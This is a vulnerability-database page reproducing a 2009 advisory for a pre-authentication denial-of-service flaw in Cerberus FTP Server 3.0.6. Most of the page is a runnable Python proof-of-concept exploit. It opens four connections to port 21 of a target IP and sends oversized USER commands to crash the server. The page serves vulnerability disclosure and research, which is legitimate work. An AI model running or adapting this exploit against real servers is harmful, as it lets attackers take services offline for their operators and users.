Vulners
Lucene search
Cerberus FTP server 3.0.6 Pre-Auth DoS
########################################################################
#############
Application: Cerberus FTP 3.0.6
Platforms: Windows XP Professional SP2
Windows Vista SP1
crash: YES
Exploitation: Remote DoS
Date: 2009-09-30
Author: Francis Provencher (Protek Research Lab's)
########################################################################
#############
1) Introduction
2) Technical details
3) The Code
########################################################################
#############
===============
1) Introduction
===============
Cerberus FTP Server is a secure and easy-to-use professional Windows FTP server featuring FIPS 140-2 certified encryption.
(from Cerberus FTP server website)
########################################################################
#############
============================
2) Technical details
============================
Cerberus FTP server Professional
Version 3.0.6
Build date 2009/09/28
########################################################################
#############
===========
3) The Code
===========
Proof of concept DoS code;
#!/usr/bin/env python
########################################################################
###########
#
# Cerberus FTP Server Denial of Service Exploit (Pre Auth)
# Found By: Francis Provencher (Protek Research Lab's)
# Tested On: Windows XPSP2
# Usage: ./script <Target IP>
#
########################################################################
###########
import socket, sys
def banner():
print "\n##################################################################"
print "# #"
print "# Cerberus FTP Server Denial of Service Exploit (Pre Auth) #"
print "# Francis Provencher (Protek Researh Lab's) #"
print "# #"
print "##################################################################\n"
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s4 = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
buff1 = ("\x41" * 330 );
buff2 = ("\x41" * 520 );
buff3 = ("\x41" * 2230 );
try:
banner();
print ("[*] Connecting to target...");
s1.connect((sys.argv[1] , 21));
s2.connect((sys.argv[1] , 21));
s3.connect((sys.argv[1] , 21));
s4.connect((sys.argv[1] , 21));
print ("[*] Sending evil stuff...");
s1.send("USER " + buff1 + "\r\n");
s2.send("USER " + buff2 + "\r\n");
s3.send("USER " + buff3 + "\r\n");
s4.send("USER " + buff1 + "\r\n");
print ("[*] Success! The server should now be inaccessible");
s1.close();
s2.close();
s3.close();
s4.close();
except:
print ("[-] Could not connect to server.");
########################################################################
#############
(PRL-2009-09)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Sep 2009 00:00Current
7.1High risk
Vulners AI Score7.1